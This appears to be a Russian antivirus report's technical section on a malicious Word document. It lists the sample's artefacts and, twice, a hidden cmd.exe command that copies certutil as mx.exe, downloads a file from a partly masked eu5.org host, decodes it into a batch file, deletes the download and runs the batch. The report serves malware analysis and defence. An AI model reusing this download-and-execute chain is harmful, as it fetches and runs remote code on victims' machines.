Техническая информация
- '<SYSTEM32>\cmd.exe' /q /c copy /y <SYSTEM32>\certutil.exe %temp%\mx.exe && cd /d %temp% && mx -urlcache -split -f http://pa####019.eu5.org/1.txt && mx -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- ClassName: 'Ghost' WindowName: ''
- '<SYSTEM32>\cmd.exe' /q /c copy /y <SYSTEM32>\certutil.exe %temp%\mx.exe && cd /d %temp% && mx -urlcache -split -f http://pa####019.eu5.org/1.txt && mx -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat' (со скрытым окном)